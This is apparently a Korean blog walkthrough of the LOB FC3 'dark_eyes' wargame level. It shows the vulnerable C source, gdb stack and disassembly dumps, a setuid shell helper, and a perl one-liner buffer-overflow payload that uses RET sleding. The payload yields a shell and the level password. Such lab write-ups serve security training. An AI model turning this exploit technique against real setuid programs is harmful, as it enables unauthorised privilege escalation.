본문 바로가기

wargame/LOB FC

LOB FC3 [iron_golem -> dark_eyes]

[iron_golem@Fedora_1stFloor ~]$ cat dark_eyes.c

/*

        The Lord of the BOF : The Fellowship of the BOF

        - dark_eyes

        - Local BOF on Fedora Core 3

        - hint : RET sleding

*/

 

int main(int argc, char *argv[])

{

        char buffer[256];

        char saved_sfp[4];

 

        if(argc < 2){

                printf("argv error\n");

                exit(0);

        }

 

        // save sfp

        memcpy(saved_sfp, buffer+264, 4);

 

        // overflow!!

        strcpy(buffer, argv[1]);

 

        // restore sfp

        memcpy(buffer+264, saved_sfp, 4);

 

        printf("%s\n", buffer);

}

 

소스를 보면, 이전문제에서 단순히 sfp변조를 막는 기법이 추가된 코드이다.

이는 febp를 막기위한 것으로써,

이를 보면 이전에 RET sleding 그대로 사용하면 될꺼같다.

 

 

[iron_golem@Fedora_1stFloor ~]$ cp dark_eyes dark_eye1

[iron_golem@Fedora_1stFloor ~]$ gdb -q dark_eye1

(no debugging symbols found)...Using host libthread_db library "/lib/tls/libthread_db.so.1".

(gdb) b main

Breakpoint 1 at 0x8048411

(gdb) r

Starting program: /home/iron_golem/dark_eye1

(no debugging symbols found)...(no debugging symbols found)...

Breakpoint 1, 0x08048411 in main ()

(gdb) x/40x $ebp

0xfefaf2f8:     0xfefaf358      0x00730e33      0x00000001      0xfefaf384

0xfefaf308:     0xfefaf38c      0x0070eab6      0x0083eff4      0x00000000

0xfefaf318:     0xfefaf310      0xfefaf358      0xfefaf300      0x00730df5

0xfefaf328:     0x00000000      0x00000000      0x00000000      0x00718fb4

0xfefaf338:     0x00000001      0x08048360      0x00000000      0x0070e9f0

0xfefaf348:     0x0070f340      0x00718fb4      0x00000001      0x08048360

0xfefaf358:     0x00000000      0x08048381      0x08048408      0x00000001

0xfefaf368:     0xfefaf384      0x080484bc      0x08048510      0x0070f340

0xfefaf378:     0xfefaf37c      0x00715e31      0x00000001      0xfefd7bfe

0xfefaf388:     0x00000000      0xfefd7c19      0xfefd7c32      0xfefd7c3d

(gdb) x/x 0x83eff4

0x83eff4 <svcauthsw+712>:       0x0083ed3c

(gdb) quit

The program is running.  Exit anyway? (y or n) y

[iron_golem@Fedora_1stFloor ~]$ cat > sh.c

#include <stdio.h>

#include <stdlib.h>

 

int main()

{

        setreuid(geteuid(),geteuid());

        setregid(getegid(),getegid());

        system("/bin/sh");

 

}

[iron_golem@Fedora_1stFloor ~]$ gcc -o sh sh.c

[iron_golem@Fedora_1stFloor ~]$ ln -s sh `perl -e 'print "\x3c\xed\x83\x00"'`

[iron_golem@Fedora_1stFloor ~]$ export PATH=./:$PATH

[iron_golem@Fedora_1stFloor ~]$ gdb -q dark_eye1

(no debugging symbols found)...Using host libthread_db library "/lib/tls/libthread_db.so.1".

(gdb) set disassembly-flavor intel

(gdb) disas main

Dump of assembler code for function main:

0x08048408 <main+0>:    push   ebp

0x08048409 <main+1>:    mov    ebp,esp

0x0804840b <main+3>:    sub    esp,0x118

0x08048411 <main+9>:    and    esp,0xfffffff0

0x08048414 <main+12>:   mov    eax,0x0

0x08048419 <main+17>:   add    eax,0xf

0x0804841c <main+20>:   add    eax,0xf

0x0804841f <main+23>:   shr    eax,0x4

0x08048422 <main+26>:   shl    eax,0x4

0x08048425 <main+29>:   sub    esp,eax

0x08048427 <main+31>:   cmp    DWORD PTR [ebp+8],0x1

0x0804842b <main+35>:   jg     0x8048447 <main+63>

0x0804842d <main+37>:   sub    esp,0xc

0x08048430 <main+40>:   push   0x804859c

0x08048435 <main+45>:   call   0x8048320 <_init+56>

0x0804843a <main+50>:   add    esp,0x10

0x0804843d <main+53>:   sub    esp,0xc

0x08048440 <main+56>:   push   0x0

0x08048442 <main+58>:   call   0x8048340 <_init+88>

0x08048447 <main+63>:   sub    esp,0x4

0x0804844a <main+66>:   push   0x4

0x0804844c <main+68>:   lea    eax,[ebp-264]

0x08048452 <main+74>:   add    eax,0x108

0x08048457 <main+79>:   push   eax

0x08048458 <main+80>:   lea    eax,[ebp-268]

0x0804845e <main+86>:   push   eax

0x0804845f <main+87>:   call   0x8048330 <_init+72>

0x08048464 <main+92>:   add    esp,0x10

0x08048467 <main+95>:   sub    esp,0x8

0x0804846a <main+98>:   mov    eax,DWORD PTR [ebp+12]

0x0804846d <main+101>:  add    eax,0x4

0x08048470 <main+104>:  push   DWORD PTR [eax]

0x08048472 <main+106>:  lea    eax,[ebp-264]

---Type <return> to continue, or q <return> to quit---

0x08048478 <main+112>:  push   eax

0x08048479 <main+113>:  call   0x8048350 <_init+104>

0x0804847e <main+118>:  add    esp,0x10

0x08048481 <main+121>:  sub    esp,0x4

0x08048484 <main+124>:  push   0x4

0x08048486 <main+126>:  lea    eax,[ebp-268]

0x0804848c <main+132>:  push   eax

0x0804848d <main+133>:  lea    eax,[ebp-264]

0x08048493 <main+139>:  add    eax,0x108

0x08048498 <main+144>:  push   eax

0x08048499 <main+145>:  call   0x8048330 <_init+72>

0x0804849e <main+150>:  add    esp,0x10

0x080484a1 <main+153>:  sub    esp,0x8

0x080484a4 <main+156>:  lea    eax,[ebp-264]

0x080484aa <main+162>:  push   eax

0x080484ab <main+163>:  push   0x80485a8

0x080484b0 <main+168>:  call   0x8048320 <_init+56>

0x080484b5 <main+173>:  add    esp,0x10

0x080484b8 <main+176>:  leave

0x080484b9 <main+177>:  ret   //ret 주소 확인

0x080484ba <main+178>:  nop

0x080484bb <main+179>:  nop

End of assembler dump.

(gdb) quit

[iron_golem@Fedora_1stFloor ~]$ ./dark_eyes `perl -e 'print "a"x268,"\xb9\x84\x04\x08"x3,"\x90\x54\x7a\x00"'`

aaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaa(Jðþ¹¹¹Tz

sh-3.00$ id

uid=502(dark_eyes) gid=502(dark_eyes) groups=501(iron_golem) context=user_u:system_r:unconfined_t

sh-3.00$ my-pass

euid = 502

because of you